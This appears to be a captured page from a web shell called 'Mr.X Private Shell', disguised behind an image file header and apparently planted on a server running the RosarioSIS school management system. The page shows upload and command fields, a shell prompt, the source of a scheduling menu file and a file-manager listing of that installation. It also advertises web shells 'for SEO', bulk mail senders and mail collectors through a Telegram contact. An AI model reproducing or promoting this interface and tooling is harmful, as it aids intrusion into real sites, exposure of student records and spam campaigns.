����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

eblama1@216.73.217.57: ~ $
<?php
/**
 * Scheduling module Menu entries
 *
 * @uses $menu global var
 *
 * @see  Menu.php in root folder
 *
 * @package RosarioSIS
 * @subpackage modules
 */

$menu['Scheduling']['admin'] = [
	'title' => _( 'Scheduling' ),
	'default' => 'Scheduling/Schedule.php',
	'Scheduling/Schedule.php' => _( 'Student Schedule' ),
	'Scheduling/Requests.php' => _( 'Student Requests' ),
	'Scheduling/MassSchedule.php' => _( 'Group Schedule' ),
	'Scheduling/MassRequests.php' => _( 'Group Requests' ),
	'Scheduling/MassDrops.php' => _( 'Group Drops' ),
	1 => _( 'Reports' ),
	'Scheduling/PrintSchedules.php' => _( 'Print Schedules' ),
	'Scheduling/PrintClassLists.php' => _( 'Print Class Lists' ),
	'Scheduling/PrintClassPictures.php' => _( 'Print Class Pictures' ),
	'Scheduling/PrintRequests.php' => _( 'Print Requests' ),
	'Scheduling/ScheduleReport.php' => _( 'Schedule Report' ),
	'Scheduling/RequestsReport.php' => _( 'Requests Report' ),
	'Scheduling/IncompleteSchedules.php' => _( 'Incomplete Schedules' ),
	'Scheduling/AddDrop.php' => _( 'Add / Drop Report' ),
	2 => _( 'Setup' ),
	'Scheduling/Courses.php' => _( 'Courses' ),
	'Scheduling/Scheduler.php' => _( 'Run Scheduler' ),
] + issetVal( $menu['Scheduling']['admin'], [] );

$menu['Scheduling']['teacher'] = [
	'title' => _( 'Scheduling' ),
	'default' => 'Scheduling/Schedule.php',
	'Scheduling/Schedule.php' => _( 'Schedule' ),
	// Activate Courses for Teachers & Parents & Students.
	'Scheduling/Courses.php' => _( 'Courses' ),
	1 => _( 'Reports' ),
	'Scheduling/PrintSchedules.php' => _( 'Print Schedules' ),
	'Scheduling/PrintClassLists.php' => _( 'Print Class Lists' ),
	'Scheduling/PrintClassPictures.php' => _( 'Print Class Pictures' ),
] + issetVal( $menu['Scheduling']['teacher'], [] );

$menu['Scheduling']['parent'] = [
	'title' => _( 'Scheduling' ),
	'default' => 'Scheduling/Schedule.php',
	'Scheduling/Schedule.php' => _( 'Schedule' ),
	'Scheduling/Requests.php' => _( 'Student Requests' ),
	// Activate Courses for Teachers & Parents & Students.
	'Scheduling/Courses.php' => _( 'Courses' ),
	1 => _( 'Reports' ),
	// Activate Print Schedules for parents and students.
	'Scheduling/PrintSchedules.php' => _( 'Print Schedules' ),
	'Scheduling/PrintClassPictures.php' => _( 'Class Pictures' ),
] + issetVal( $menu['Scheduling']['parent'], [] );

$exceptions['Scheduling'] = [
	'Scheduling/Requests.php' => true,
	'Scheduling/MassRequests.php' => true,
	'Scheduling/Scheduler.php' => true
];

Filemanager

Name Type Size Permission Actions
includes Folder 0755
AddDrop.php File 2.52 KB 0644
Courses.php File 52.23 KB 0644
IncompleteSchedules.php File 4.17 KB 0644
MassDrops.php File 9.03 KB 0644
MassRequests.php File 6.37 KB 0644
MassSchedule.php File 8.22 KB 0644
Menu.php File 2.4 KB 0644
PrintClassLists.php File 4.24 KB 0644
PrintClassPictures.php File 8.54 KB 0644
PrintRequests.php File 3.64 KB 0644
PrintSchedules.php File 14.09 KB 0644
Requests.php File 9.52 KB 0644
RequestsReport.php File 842 B 0644
Schedule.php File 27.21 KB 0644
ScheduleReport.php File 1.13 KB 0644
Scheduler.php File 20.4 KB 0644
functions.inc.php File 2.69 KB 0644
new_Requests.php File 2.28 KB 0644